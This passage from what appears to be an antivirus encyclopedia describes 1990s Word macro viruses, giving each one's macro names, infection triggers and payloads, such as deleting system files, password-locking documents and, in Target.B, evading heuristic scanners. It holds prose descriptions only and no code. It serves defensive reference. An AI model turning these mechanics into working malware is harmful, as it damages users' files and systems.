  25042. Macro names: AutoClose, AutoOpen, Crud, FileSaveAs
  25043. Size of macros: 1923 Bytes
  25044. Place of origin: USA
  25045. Date of origin: April 1997
  25046. Payload: Yes
  25047. Seen In-The-Wild: No
  25048. Description:
  25049.  
  25050. Talon.H infects the global template (normal.dot) when an
  25051. infected document is opened (AutoOpen). Further documents
  25052. become infected when they are saved (FileSaveAs) or closed
  25053. (AutoClose).
  25054.  
  25055. The main difference between this new variant and the
  25056. previous Talon viruses is that Talon.H adds two menu items
  25057. (called Eifel Crud).
  25058.  
  25059. When selected, Talon.H triggers and saves the active
  25060. document with the password "  crud  ".
  25061. After that it creates a new document with the following text:
  25062.  
  25063. "   You are infected with the Eifel Crud!   "
  25064. "   Talon Strikes Again! 1997   "
  25065.  
  25066. Talon.H is another virus that devolves into Talon.H1 and
  25067. Talon.H2. This occurs when closing (AutoClose) a Talon.H infected
  25068. document and saving (FileSaveAs) a Talon.H1 infected file.
  25069.  
  25070. Due to the missing macros, Talon.H1 and Talon.H2 will
  25071. produce WordBasic error messages.
  25072.  
  25073. [Word_Target.B (a.k.a LoneStar, Lone)]
  25074. Virus name: Word.Target.B (a.k.a LoneStar, Lone)
  25075. Virus Type: Word macro virus
  25076. Number of macros: 1 (German version of Word)
  25077.                   2 (Any other version of Word)
  25078. Encrypted: Yes
  25079. Macro names: LoneRaider (LoneRaiderTwo)
  25080. Size of macros: 3463 Bytes
  25081. Place of origin: Germany
  25082. Date of origin: Unknown
  25083. Destructive: No
  25084. Common In-The-Wild: No
  25085.  
  25086. Target activates when the assigned key (SPACE) is pressed.
  25087. Target is an attempt to fool heuristic macro virus scanners. Its
  25088. virus macros do not contain the command to copy viruses.
  25089. Instead it creates a second macro (LoneRaiderTwo) and copies
  25090. all the commands for activation and infection into it. After
  25091. execution the second macro is deleted.  As a result, some
  25092. heuristic scanners do not flag Target as suspicious.  When
  25093. Target is activated from a non-German version of Microsoft
  25094. Word it will not spread and the second macro will not be
  25095. deleted.
  25096.  
  25097. Upon pressing "SPACE" on January 1st of each year, Target
  25098. creates a new document with the following text:
  25099.  
  25100. "   Enjoy the first F/WIN Killer!   "
  25101. "   LoneRaider!   "
  25102. "   Nightmare Joker   "
  25103. "   1996   "
  25104.  
  25105. When Target was released to the public, F-WIN Heuristic
  25106. Anti-Virus, written by Stefan Kurtzhals, was unable to detect
  25107. Target due to the reasons above. This was changed
  25108. immediately and every up-to-date anti-virus program should
  25109. be able to catch this virus.
  25110.  
  25111. [Word_Tear.A]
  25112. Virus name: Word.Tear.A
  25113. Virus Type: Word macro virus
  25114. Number of macros: 2
  25115. Encrypted: Yes
  25116. Macro names: AutoOpen, FileSaveAs)
  25117. Size of macros: 1684 Bytes
  25118. Place of origin: Russia
  25119. Date of origin: April 1997
  25120. Destructive: No
  25121. Seen In-The-Wild: No
  25122. Description:
  25123.  
  25124. Tear.A infects the global template (normal.dot) when an infected
  25125. document is opened. Further documents become infected when
  25126. they are saved (FileSaveAs).
  25127.  
  25128. The following comments can be found in the "AutoOpen" macro
  25129. code:
  25130.  
  25131. "   (c) 1997 Master of Infection   "
  25132. "   QUEEN FOREVER!!!   "
  25133. "   I love you,Freddie!!!   "
  25134. "   Here is my Mother's love!!!   "
  25135.  
  25136. "   I don't want to sleep with you   "
  25137. "   I don't need the passion too   "
  25138. "   I don't want a stormy affair   "
  25139. "   To make me feel my life is heading somewhere   "
  25140. "   All I want is comfort and care   "
  25141. "   Just to know that my woman gives me sweet -   "
  25142. "   Mother Love   "
  25143.  
  25144. "   I've walked too long in this lonely lane   "
  25145. "   I've had enough of this same old game   "
  25146. "   I'm a man of the world and they say that I'm strong   "
  25147. "   But my heart is heavy, and my hope is gone   "
  25148.  
  25149. "   Out in the city, in the cold world outside   "
  25150. "   I don't want to pity, just a safe place to hide   "
  25151. "   Mama please, let me back inside   "
  25152.  
  25153. "   I don't want to make no waves   "
  25154. "   But you can give me all the love that I crave   "
  25155. "   I can't take it if you see me cry   "
  25156. "   I long for peace before I die   "
  25157. "   All I want is to know that you're there   "
  25158. "   You're gonna give me all your sweet -   "
  25159. "   Mother Love   "
  25160.  
  25161. "   My body's aching, but I can't sleep   "
  25162. "   My dreams are all the company I keep   "
  25163. "   Got such a feeling as the sun goes down  "
  25164. "   I'm coming home to my sweet -  "
  25165. "   Mother Love   "
  25166.  
  25167. When an infected document is opened, Tear displays the
  25168. following message:
  25169.  
  25170. "   Tear it up!   "
  25171.  
  25172. [Word_Tedious.A]
  25173. Virus name: Word.Tedious.A
  25174. Virus Type: Word macro virus
  25175. Number of macros: 4
  25176. Encrypted: Yes
  25177. Macro names: AutoNew, FileSaveAs, VAutoNew, VFileSaveAs
  25178. Size of macros: 1082 Bytes
  25179. Place of origin: Unknown
  25180. Date of origin: August 1996
  25181. Payload: No
  25182. Common In-The-Wild: No
  25183. Description:
  25184.  
  25185. Tedious infects documents when the "FileSaveAs" command
  25186. is used.  Infected documents are converted internally to
  25187. templates which is very common for macro viruses.
  25188. Since Tedious uses English macro names it will not work with
  25189. Non-English versions of Microsoft Word.
  25190.  
  25191. Even though one major US anti-virus company reported
  25192. Tedious as being destructive, users do not need to fear this
  25193. virus.  Tedious is harmless and does nothing else besides
  25194. replicating.
  25195.  
  25196. [Word_Tele.A (a.k.a LBYNJ, Telefonica, Tele-Sex)]
  25197. Virus name: Word.Tele.A (a.k.a LBYNJ, Telefonica, Tele-Sex)
  25198. Virus Type: Word macro virus
  25199. Number of macros: 7
  25200. Encrypted: Yes
  25201. Macro names: AutoExec, AutoOpen, DateiBeenden, DateiDrucken,
  25202.              DateiNeu, DateiOeffnen, Telefonica
  25203. Size of macros: 22256 Bytes
  25204. Place of origin: Germany
  25205. Date of origin: April 1996
  25206. Destructive: Yes
  25207. Common In-The-Wild: No
  25208. Description:
  25209.  
  25210. Tele's "AutoExec" macro includes the infection routine for the
  25211. global template (normal.dot), which will not get infected when
  25212. inside the WIN.INI file (entry "Compatibility"), the string
  25213. "0x0030303" is set to "LBYNJ".
  25214.  
  25215. Tele uses the "Telefonica" macro to check for a previous
  25216. infection.  It will not infect the global template if the macro is
  25217. already present.
  25218.  
  25219. Documents are infected upon "DateiBeenden" ("FileClose"),
  25220. "DateiNeu" ("FileNew") and "DateiOeffnen" ("FileOpen"),
  25221. whereby at the end of "DateiOeffnen" ("FileOpen") the macro
  25222. "Telefonica" is called again.  Infected documents are changed
  25223. to templates, which is very common for macro viruses.
  25224.  
  25225. Tele has two destructive payloads. The first one can be found
  25226. in the "DateiDrucken" (FilePrint) macro. Upon printing a
  25227. document, Tele checks the system time and in case of a
  25228. value less than 10 in the seconds field, it will add the
  25229. following text at the end of the printed document:
  25230.  
  25231. "   Lucifer by Nightmare Joker (1996)   "
  25232.  
  25233. The second payload is activated from the "Telefonica" macro
  25234. when the second field has a value of 0 or 1. ("Telefonica" is
  25235. called from "AutoOpen", "AutoExec" and "DateiOeffnen"). If
  25236. this is the case, Tele creates a Debug script, (filename:
  25237. TELEFONI.SCR), inside the "C:\DOS" directory which
  25238. includes the DOS-based virus "Kampana.3784".
  25239.  
  25240. After creating the script file, LBYNJ executes the
  25241. "TELEFONI.BAT" batch file which uses the DOS command
  25242. "DEBUG.EXE" to convert the script file into an executable
  25243. DOS-based virus and then starts it.
  25244.  
  25245. [Word_Temple.A]
  25246. Virus name: Word.Temple.A
  25247. Virus Type: Word macro virus
  25248. Number of macros: 4
  25249. Encrypted: No
  25250. Macro names: AutoOpen (TempAutoOpen), TempAutoExec (AutoExec)
  25251.              TempFileOpen (FileOpen), TempFileSave (FileSave)
  25252. Size of macros: 1011 Bytes
  25253. Place of origin: Unknown
  25254. Date of origin: Spring 1997
  25255. Destructive: No
  25256. Seen In-The-Wild: No
  25257. Description:
  25258.  
  25259. Temple is another do-nothing macro virus. It is only infectious.
  25260.  
  25261. Temple.A infects the global template (normal.dot) when an
  25262. infected document is opened. Further documents become
  25263. infected when they are also opened (AutoOpen) or saved
  25264. (FileSaveAs).
  25265.  
  25266. [Word_Theatre.A (a.k.a Taiwan.Theater)]
  25267. Virus name: Word.Theatre.A (a.k.a Taiwan.Theater)
  25268. Virus Type: Word macro virus
  25269. Number of macros: 6
  25270. Encrypted: Yes
  25271. Macro names: AutoOpen, CK, CK1, DocClose, FileClose, ToolsMacro
  25272. Size of macros: 7495 Bytes
  25273. Place of origin: Taiwan
  25274. Date of origin: Unknown
  25275. Destructive: Yes
  25276. Seen In-The-Wild: No
  25277. Description:
  25278.  
  25279. Theatre is another macro virus written for the
  25280. Taiwanese/Chinese version of Microsoft Word.
  25281.  
  25282. It activates when an infected file is opened. Upon the 1st of
  25283. each month, Theatre triggers and deletes all the files in the
  25284. C:\ root directory. This leaves the computer unbootable.
  25285.  
  25286. The following messages are displayed:
  25287.  
  25288. "   TAIWAN THEATRE VIRUS by Dark Word   "
  25289. "   Hay..Hay..YOU GOT A THEATRE VIRUS.   "
  25290.  
  25291. [Word_Theater.B]
  25292. Virus name: Word.Theatre.B
  25293. Virus Type: Word macro virus
  25294. Number of macros: 4
  25295. Encrypted: Yes
  25296. Macro names: CK, DocClose, FileClose, ToolsMacro
  25297. Size of macros: 7495 Bytes
  25298. Place of origin: Taiwan
  25299. Date of origin: Unknown
  25300. Destructive: Yes
  25301. Seen In-The-Wild: No
  25302. Description:
  25303.  
  25304. Theatre.B is another macro virus written for the
  25305. Taiwanese/Chinese version of Microsoft Word.
  25306.  
  25307. The difference between this new variant and the original
  25308. Theatre virus is the trigger date and the displayed message.
  25309.  
  25310. Theatre.B deletes all the files in the C:\ root directory upon
  25311. reaching the 15th of each month.
  25312.  
  25313. It displays the following message:
  25314.  
  25315. "   THEATRE   "
  25316.  
  25317. Our Theatre.B virus sample also contains errors in the
  25318. "FileClose" macro, which results to no further infections.
  25319.  
  25320. [Word_Toten.A:De]
  25321. Virus name: Word.Toten.A:De
  25322. Virus Type: Word macro virus
  25323. Number of macros: 2
  25324. Encrypted: Yes
  25325. Macro names: README, AutoOpen (DateiSpeichern)
  25326. Size of macros: 2057 Bytes
  25327. Place of origin: Germany
  25328. Date of origin: Spring 1997
  25329. Payload: Yes
  25330. Seen In-The-Wild: Yes
  25331. Description:
  25332.  
  25333. Toten infects the global template (normal.dot) when an
  25334. infected document is opened. Further documents become
  25335. infected when they are saved (DateiSpeichern).
  25336.  
  25337. When Toten triggers, it encrypts documents with semi-random
  25338. passwords. If you find a document with an unknown password,
  25339. please download a copy of WinWord Password Recovery Tool
  25340. (wwprt).  It is available at: www.vdsarg.com.
  25341.  
  25342. When a document is saved on February 1, 2000, Toten displays
  25343. the following German message:
  25344.  
  25345. "   Der Virus wurde von M.N. aus Schwelm (BRD)am 08.06.1996   "
  25346. "   programmiert. Ich bin ein Hosen Fan.    "
  25347.  
  25348. Toten contains several other comments related to the German
  25349. punk music group: "  Die Toten Hosen  ".
  25350.  
  25351. Toten.A uses language specific macros, therefore it only
  25352. works with the German version of Microsoft Word.
  25353.  
  25354. [Word_Twister.A]
  25355. Virus name: Word.Twister.A
  25356. Virus Type: Word macro virus
  25357. Number of macros: 8
  25358. Encrypted: No
  25359. Macro names: FileSaveAs, AutoExec, twAC, FileSave, AutoExit,
  25360.              twFC, twFE, twFQ, twFSA, twAE, AutoClose, twFS,
  25361.              twEX, FileClose, FileExit, FileQuit
  25362. Size of macros: 4628 Bytes
  25363. Place of origin: Unknown
  25364. Date of origin: Unknown
  25365. Payload: No
  25366. Seen In-The-Wild: No
  25367. Description:
  25368.  
  25369. Twister is a very simple virus that does nothing but replicate.
  25370. It has 2 sets of macros: one for infecting the global template
  25371. the other for infecting documents. It swaps them upon activation
  25372. and upon infection.
  25373.  
  25374. The AutoExec macro contains the following text string:
  25375.  
  25376. "   Twister 2000" v.1 (c) Neo-Luddite Inc.   "
  25377. "   For Robin Hood   "
  25378.  
  25379. [Word_TWNO.A (a.k.a. Taiwan_1)]
  25380. Virus name: Word.TWNO.A (a.k.a. Taiwan_1)
  25381. Virus Type: Word macro virus
  25382. Number of macros: 1 or 3
  25383. Encrypted: No
  25384. Macro names: AutoOpen, AutoNew, AutoClose
  25385. Size of macros: 1567 Bytes in .doc files
  25386.                 4701 Bytes in global template
  25387. Place of origin: Taiwan
  25388. Date of origin: Unknown
  25389. Payload: Yes
  25390. Seen In-The-Wild: Yes
  25391. Description:
  25392.  
  25393. TWNO was the first macro virus written for the
  25394. Taiwanese/Chinese version of Microsoft Word.
  25395.  
  25396. TWNO infects the global template (normal.dot) when an
  25397. infected document is opened.  Further documents become
  25398. infected when they are opened (AutoOpen), closed
  25399. (AutoClose) or when a new document is created (AutoNew).
  25400.  
  25401. While TWNO has only one macro in infected documents,
  25402. it copies and renames it to 3 macros in the global template.
  25403.  
  25404. On the 13th of each month TWNO inserts text into the active
  25405. document and then displays the following message:
  25406.  
  25407. "   NO_1 Macro Virus   "
  25408.  
  25409. [Word_TWNO.B (a.k.a. KillMario)]
  25410. Virus name: Word.TWNO.B (a.k.a. KillMario)
  25411. Virus Type: Word macro virus
  25412. Number of macros: 1 or 3
  25413. Encrypted: No
  25414. Macro names: AutoExec, AutoNew, AutoClose
  25415. Size of macros: 1387 Bytes in .doc files
  25416.                 4161 Bytes in global template
  25417. Place of origin: Taiwan
  25418. Date of origin: Unknown
  25419. Payload: No
  25420. Seen In-The-Wild: No
  25421. Description:
  25422.  
  25423. TWNO.B is another virus written for the Taiwanese/
  25424. Chinese version of Microsoft Word.
  25425.  
  25426. The difference between this new variant and the original
  25427. TWNO.A virus is that TWNO.B contains the "AutoExec"
  25428. macro instead of the "AutoOpen" macro.
  25429.  
  25430. The submitted first generation sample is also not capable of
  25431. further infecting documents. Microsoft Word is halted when
  25432. the user starts Word from an already infected global template.
  25433.  
  25434. [Word.TWNO.C]
  25435. Virus name: Word.TWNO.C
  25436. Virus Type: Word macro virus
  25437. Number of macros: 1 or 3 (global template)
  25438. Encrypted: No
  25439. Macro names: AutoOpen (AutoNew, AutoClose)
  25440. Size of macros: 1404 Bytes in documents
  25441.                 4212 Bytes in global template
  25442. Place of origin: Taiwan
  25443. Date of origin: Fall 1996
  25444. Destructive: Yes
  25445. Seen In-The-Wild: No
  25446. Description:
  25447.  
  25448. TWNO.C is another virus written for the Taiwanese/Chinese
  25449. version of Microsoft Word.
  25450.  
  25451. The difference between this new variant and the previous
  25452. TWNO.B virus is that it contains an "AutoOpen" macro
  25453. instead of "AutoExec".
  25454.  
  25455. TWNO.C infects the global template when an infected
  25456. document is opened. Further documents become infected
  25457. when they are closed (AutoClose), created (AutoNew) or
  25458. opened (AutoOpen).
  25459.  
  25460. While TWNO.B is not capable of further infecting documents,
  25461. TWNO.C is able to infect new documents and also execute its
  25462. destructive payloads.
  25463.  
  25464. On the 28th of each month, TWNO.C asks a question and
  25465. depending on the answer, it executes one of its two payloads:
  25466.  
  25467. 1. It deletes CONFIG.SYS, AUTOEXEC.BAT, and COMMAND.COM!
  25468.  
  25469. 2. It deletes all files in the C:\DOS and C:\ET3 directory.
  25470.  
  25471. On the 1st of each month, TWNO.C deletes the following files:
  25472.  
  25473. C:\COMMAND.COM
  25474. C:\AUTOEXEC.BAT
  25475. C:\CONFIG.SYS
  25476.  
  25477. [Word_TWNO.D]
  25478. Virus name: Word.TWNO.D
  25479. Virus Type: Word macro virus
  25480. Number of macros: 1 or 3 (global template)
  25481. Encrypted: No
  25482. Macro names: AutoOpen (AutoNew, AutoClose)
  25483. Size of macros: 2105 Bytes in documents
  25484.                 6315 Bytes in global template
  25485. Place of origin: Taiwan
  25486. Date of origin: Fall 1996
  25487. Destructive: Yes
  25488. Seen In-The-Wild: No
  25489. Description:
  25490.  
  25491. TWNO.D is another virus written for the Taiwanese/Chinese
  25492. version of Microsoft Word. Compared to previous TWNO
  25493. viruses, its WordBasic code has been rewritten.
  25494.  
  25495. TWNO.D infects the global template when an infected
  25496. document is opened. Further documents become infected when
  25497. they are closed (AutoClose), created (AutoNew) or opened
  25498. (AutoOpen).
  25499.  
  25500. On the 25th of each month, TWNO.D changes the Word
  25501. menubar items and then asks a question to the user. Depending
  25502. on the answer, it deletes the following files:
  25503.  
  25504. "C:\DOS\*.*"
  25505. "C:\WINDOWS\*.INI"
  25506.  
  25507. After that TWNO.D shows 3 different messages.
  25508.  
  25509. On the 15th of each month, TWNO.D deletes the following files:
  25510.  
  25511. "C:\COMMAND.COM"
  25512. "C:\CONFIG.SYS"
  25513. "C:\MSDOS.SYS"
  25514. "C:\IO.SYS"
  25515.  
  25516. [Word_TWNO.K]
  25517. Virus name: Word.TWNO.K
  25518. Virus Type: Word macro virus
  25519. Number of macros: 1 or 3 (global template)
  25520. Encrypted: No
  25521. Macro names: AutoOpen (AutoNew, AutoClose)
  25522. Size of macros: 1403 Bytes in documents
  25523.                 4209 Bytes in global template
  25524. Place of origin: Taiwan
  25525. Date of origin: Fall 1996
  25526. Destructive: Yes
  25527. Seen In-The-Wild: No
  25528. Description:
  25529.  
  25530. TWNO.K is another virus written for the Taiwanese/Chinese
  25531. version of Microsoft Word.
  25532.  
  25533. The difference between this new variant and the previous
  25534. TWNO.C virus is that the code was slightly modified.
  25535.  
  25536. TWNO.K infects the global template when an infected
  25537. document is opened. Further documents become infected when
  25538. they are closed (AutoClose), created (AutoNew) or opened
  25539. (AutoOpen).
  25540.  
  25541. For additional information, please refer to the TWNO.C virus
  25542. description.
  25543.  
  25544. [Word_TWNO.L]
  25545. Virus name: Word.TWNO.L
  25546. Virus Type: Word macro virus
  25547. Number of macros: 1 or 3 (global template)
  25548. Encrypted: No
  25549. Macro names: AutoOpen (AutoNew, AutoClose)
  25550. Size of macros: 1402 Bytes in documents
  25551.                 4206 Bytes in global template
  25552. Place of origin: Taiwan
  25553. Date of origin: Fall 1996
  25554. Destructive: Yes
  25555. Seen In-The-Wild: No
  25556. Description:
  25557.  
  25558. TWNO.L is another virus written for the Taiwanese/Chinese
  25559. version of Microsoft Word.  The difference between this new
  25560. variant and the previous TWNO.C virus is that the code was
  25561. slightly modified.
  25562.  
  25563. TWNO.L infects the global template when an infected
  25564. document is opened. Further documents become infected
  25565. when they are closed (AutoClose), created (AutoNew) or
  25566. opened (AutoOpen).
  25567.  
  25568. For additional information, please refer to the TWNO.C virus
  25569. description.
  25570.  
  25571.  
  25572. [Word_TWNO.M]
  25573. Virus name: Word.TWNO.M
  25574. Virus Type: Word macro virus
  25575. Number of macros: 1 or 3 (global template)
  25576. Encrypted: No
  25577. Macro names: AutoOpen (AutoNew, AutoClose)
  25578. Size of macros: 1392 Bytes in documents
  25579.                 4176 Bytes in global template
  25580. Place of origin: Taiwan
  25581. Date of origin: Fall 1996
  25582. Destructive: Yes
  25583. Seen In-The-Wild: No
  25584. Description:
  25585.  
  25586. TWNO.M is another virus written for the Taiwanese/Chinese
  25587. version of Microsoft Word. The difference between this new
  25588. variant and the previous TWNO.C virus is that the code was
  25589. slightly modified.
  25590.  
  25591. TWNO.M infects the global template when an infected
  25592. document is opened. Further documents become infected
  25593. when they are closed (AutoClose), created (AutoNew) or
  25594. opened (AutoOpen).
  25595.  
  25596. For additional information, please refer to the TWNO.C virus
  25597. description.
  25598.  
  25599. [Word_TWNO.N]
  25600. Virus name: Word.TWNO.N
  25601. Virus Type: Word macro virus
  25602. Number of macros: 1 or 3 (global template)
  25603. Encrypted: No
  25604. Macro names: AutoOpen (AutoNew, AutoClose)
  25605. Size of macros: 1264 Bytes in documents
  25606.                 3792 Bytes in global template
  25607. Place of origin: Taiwan
  25608. Date of origin: Fall 1996
  25609. Destructive: Yes
  25610. Seen In-The-Wild: No
  25611. Description:
  25612.  
  25613. TWNO.N is another virus written for the Taiwanese/Chinese
  25614. version of Microsoft Word. The difference between this new
  25615. variant and the previous TWNO.C virus is that the code was
  25616. slightly modified.
  25617.  
  25618. TWNO.N infects the global template when an infected
  25619. document is opened. Further documents become infected
  25620. when they are closed (AutoClose), created (AutoNew) or
  25621. opened (AutoOpen).
  25622.  
  25623. For additional information, please refer to the TWNO.C virus
  25624. description.
  25625.  
  25626. [Word_TWNO.O]
  25627. Virus name: Word.TWNO.O
  25628. Virus Type: Word macro virus
  25629. Number of macros: 1 or 3 (global template)
  25630. Encrypted: No
  25631. Macro names: AutoOpen (AutoNew, AutoClose)
  25632. Size of macros: 1406 Bytes in documents
  25633.                 4218 Bytes in global template
  25634. Place of origin: Taiwan
  25635. Date of origin: Fall 1996
  25636. Destructive: Yes
  25637. Seen In-The-Wild: No
  25638. Description:
  25639.  
  25640. TWNO.O is another virus written for the Taiwanese/Chinese
  25641. version of Microsoft Word.
  25642.  
  25643. The difference between this new variant and the previous
  25644. TWNO.C virus is that the code was slightly modified.
  25645.  
  25646. TWNO.O infects the global template when an infected
  25647. document is opened. Further documents become infected
  25648. when they are closed (AutoClose), created (AutoNew) or
  25649. opened (AutoOpen).
  25650.  
  25651. For additional information, please refer to the TWNO.C virus
  25652. description.
  25653.  
  25654. [Word_TWNO.P]
  25655. Virus name: Word.TWNO.P
  25656. Virus Type: Word macro virus
  25657. Number of macros: 1 or 3 (global template)
  25658. Encrypted: No
  25659. Macro names: AutoOpen (AutoNew, AutoClose)
  25660. Size of macros: 1404 Bytes in documents
  25661.                 4212 Bytes in global template
  25662. Place of origin: Taiwan
  25663. Date of origin: Fall 1996
  25664. Destructive: Yes
  25665. Seen In-The-Wild: No
  25666. Description:
  25667.  
  25668. TWNO.P is another virus written for the Taiwanese/Chinese
  25669. version of Microsoft Word.
  25670.  
  25671. The difference between this new variant and the previous
  25672. TWNO.C virus is that the code was slightly modified.
  25673.  
  25674. TWNO.P infects the global template when an infected
  25675. document is opened. Further documents become infected
  25676. when they are closed (AutoClose), created (AutoNew) or
  25677. opened (AutoOpen).
  25678.  
  25679. For additional information, please refer to the TWNO.C virus
  25680. description.
  25681.  
  25682. [Word_TWNO.Q]
  25683. Virus name: Word.TWNO.Q
  25684. Virus Type: Word macro virus
  25685. Number of macros: 1 or 3 (global template)
  25686. Encrypted: No
  25687. Macro names: AutoOpen (AutoNew, AutoClose)
  25688. Size of macros: 1286 Bytes in documents
  25689.                 3858 Bytes in global template
  25690. Place of origin: Taiwan
  25691. Date of origin: Fall 1996
  25692. Destructive: Yes
  25693. Seen In-The-Wild: No
  25694. Description:
  25695.  
  25696. TWNO.Q is another virus written for the Taiwanese/Chinese
  25697. version of Microsoft Word.
  25698.  
  25699. The difference between this new variant and the previous
  25700. TWNO.C virus is that the code was slightly modified.
  25701.  
  25702. TWNO.Q infects the global template when an infected
  25703. document is opened. Further documents become infected
  25704. when they are closed (AutoClose), created (AutoNew) or
  25705. opened (AutoOpen).
  25706.  
  25707. For additional information, please refer to the TWNO.C virus
  25708. description.
  25709.  
  25710. [Word_TWNO.R]
  25711. Virus name: Word.TWNO.R
  25712. Virus Type: Word macro virus
  25713. Number of macros: 1 or 3 (global template)
  25714. Encrypted: No
  25715. Macro names: AutoOpen (AutoNew, AutoClose)
  25716. Size of macros: 1214 Bytes in documents
  25717.                          3642 Bytes in global template
  25718. Place of origin: Taiwan
  25719. Date of origin: Fall 1996
  25720. Destructive: Yes
  25721. Seen In-The-Wild: No
  25722. Description:
  25723.  
  25724. TWNO.R is another virus written for the Taiwanese/Chinese
  25725. version of Microsoft Word.
  25726.  
  25727. The difference between this new variant and the previous
  25728. TWNO.C virus is that the code was slightly modified.
  25729.  
  25730. TWNO.R infects the global template when an infected
  25731. document is opened. Further documents become infected
  25732. when they are closed (AutoClose), created (AutoNew) or
  25733. opened (AutoOpen).
  25734.  
  25735. For additional information, please refer to the TWNO.C virus
  25736. description.
  25737.  
  25738. [Word_TWNO.S]
  25739. Virus name: Word.TWNO.S
  25740. Virus Type: Word macro virus
  25741. Number of macros: 1 or 3 (global template)
  25742. Encrypted: No
  25743. Macro names: AutoOpen (AutoNew, AutoClose)
  25744. Size of macros: 1212 Bytes in documents
  25745.                 3636 Bytes in global template
  25746. Place of origin: Taiwan
  25747. Date of origin: Fall 1996
  25748. Destructive: Yes
  25749. Seen In-The-Wild: No
  25750. Description:
  25751.  
  25752. TWNO.S is another virus written for the Taiwanese/Chinese
  25753. version of Microsoft Word.
  25754.  
  25755. The difference between this new variant and the previous
  25756. TWNO.C virus is that the code was slightly modified.
  25757.  
  25758. TWNO.S infects the global template when an infected
  25759. document is opened. Further documents become infected
  25760. when they are closed (AutoClose), created (AutoNew) or
  25761. opened (AutoOpen).
  25762.  
  25763. For additional information, please refer to the TWNO.C virus
  25764. description.
  25765.  
  25766. [Word_TWNO.T]
  25767. Virus name: Word.TWNO.T
  25768. Virus Type: Word macro virus
  25769. Number of macros: 1 or 3 (global template)
  25770. Encrypted: No
  25771. Macro names: AutoOpen (AutoNew, AutoClose)
  25772. Size of macros: 1206 Bytes in documents
  25773.                 3618 Bytes in global template
  25774. Place of origin: Taiwan
  25775. Date of origin: Fall 1996
  25776. Destructive: Yes
  25777. Seen In-The-Wild: No
  25778. Description:
  25779.  
  25780. TWNO.T is another virus written for the Taiwanese/Chinese
  25781. version of Microsoft Word.
  25782.  
  25783. The difference between this new variant and the previous
  25784. TWNO.C virus is that the code was slightly modified.
  25785.  
  25786. TWNO.T infects the global template when an infected
  25787. document is opened. Further documents become infected
  25788. when they are closed (AutoClose), created (AutoNew) or
  25789. opened (AutoOpen).
  25790.  
  25791. For additional information, please refer to the TWNO.C virus
  25792. description.
  25793.  
  25794. [Word_TWNO.U]
  25795. Virus name: Word.TWNO.U
  25796. Virus Type: Word macro virus
  25797. Number of macros: 1 or 3 (global template)
  25798. Encrypted: No
  25799. Macro names: AutoOpen (AutoNew, AutoClose)
  25800. Size of macros: 970 Bytes in documents
  25801.                 2910 Bytes in global template
  25802. Place of origin: Taiwan
  25803. Date of origin: Fall 1996
  25804. Destructive: Yes
  25805. Seen In-The-Wild: No
  25806. Description:
  25807.  
  25808. TWNO.U is another virus written for the Taiwanese/Chinese
  25809. version of Microsoft Word.
  25810.  
  25811. The difference between this new variant and the previous
  25812. TWNO.C virus is that the code was slightly modified.
  25813.  
  25814. TWNO.U infects the global template when an infected
  25815. document is opened. Further documents become infected
  25816. when they are closed (AutoClose), created (AutoNew) or
  25817. opened (AutoOpen).
  25818.  
  25819. For additional information, please refer to the TWNO.C virus
  25820. description.
  25821.  
  25822. [Word_TWNO.V]
  25823. Virus name: Word.TWNO.V
  25824. Virus Type: Word macro virus
  25825. Number of macros: 1 or 3 (global template)
  25826. Encrypted: No
  25827. Macro names: AutoOpen (AutoNew, AutoClose)
  25828. Size of macros: 924 Bytes in documents
  25829.                 2772 Bytes in global template
  25830. Place of origin: Taiwan
  25831. Date of origin: Fall 1996
  25832. Destructive: Yes
  25833. Seen In-The-Wild: No
  25834. Description:
  25835.  
  25836. TWNO.V is another virus written for the Taiwanese/Chinese
  25837. version of Microsoft Word.
  25838.  
  25839. The difference between this new variant and the previous
  25840. TWNO.C virus is that the code was slightly modified.
  25841.  
  25842. TWNO.V infects the global template when an infected
  25843. document is opened. Further documents become infected
  25844. when they are closed (AutoClose), created (AutoNew) or
  25845. opened (AutoOpen).
  25846.  
  25847. For additional information, please refer to the TWNO.C virus
  25848. description.
  25849.  
  25850. [Word_TWNO.W]
  25851. Virus name: Word.TWNO.W
  25852. Virus Type: Word macro virus
  25853. Number of macros: 1 or 3 (global template)
  25854. Encrypted: No
  25855. Macro names: AutoOpen (AutoNew, AutoClose)
  25856. Size of macros: 888 Bytes in documents
  25857.                 2664 Bytes in global template
  25858. Place of origin: Taiwan
  25859. Date of origin: Fall 1996
  25860. Destructive: Yes
  25861. Seen In-The-Wild: No
  25862. Description:
  25863.  
  25864. TWNO.W is another virus written for the Taiwanese/Chinese
  25865. version of Microsoft Word.
  25866.  
  25867. The difference between this new variant and the previous
  25868. TWNO.C virus is that the code was slightly modified.
  25869.  
  25870. TWNO.W infects the global template when an infected
  25871. document is opened. Further documents become infected
  25872. when they are closed (AutoClose), created (AutoNew) or
  25873. opened (AutoOpen).
  25874.  
  25875. For additional information, please refer to the TWNO.C virus
  25876. description.
  25877.  
  25878. [Word_TWNO.X]
  25879. Virus name: Word.TWNO.X
  25880. Virus Type: Word macro virus
  25881. Number of macros: 1 or 3 (global template)
  25882. Encrypted: No
  25883. Macro names: AutoOpen (AutoNew, AutoClose)
  25884. Size of macros: 872 Bytes in documents
  25885.                 2616 Bytes in global template
  25886. Place of origin: Taiwan
  25887. Date of origin: Fall 1996
  25888. Destructive: Yes
  25889. Seen In-The-Wild: No
  25890. Description:
  25891.  
  25892. TWNO.X is another virus written for the Taiwanese/Chinese
  25893. version of Microsoft Word.
  25894.  
  25895. The difference between this new variant and the previous
  25896. TWNO.C virus is that the code was slightly modified.
  25897.  
  25898. TWNO.X infects the global template when an infected
  25899. document is opened. Further documents become infected
  25900. when they are closed (AutoClose), created (AutoNew) or
  25901. opened (AutoOpen).
  25902.  
  25903. For additional information, please refer to the TWNO.C virus
  25904. description.
  25905.  
  25906. [Word_TwoLines.A]
  25907. Virus name: Word.TwoLines.A
  25908. Virus Type: Word macro virus
  25909. Number of macros: 5 and 4 for A1
  25910. Encrypted: Yes
  25911. Macro names: MSRun, AutoExec, AutoOpen, AutoClose, FileSaveAs
  25912. Size of macros: 1817 Bytes or 1767 Bytes
  25913. Place of origin: Unknown
  25914. Date of origin: February 1997
  25915. Destructive: No
  25916. Common In-The-Wild: No
  25917. Description:
  25918.  
  25919. TwoLines infects the global template when an infected
  25920. document is opened (AutoOpen) or closed (AutoClose).
  25921. As the name suggests it adds 2 empty lines to the active
  25922. document when the minute field of the system time shows
  25923. 20 minutes. Responsible for this action is the "MsRun" macro.
  25924.  
  25925. The "FileSaveAs" macro converts documents to templates, yet
  25926. does not infect them.
  25927.  
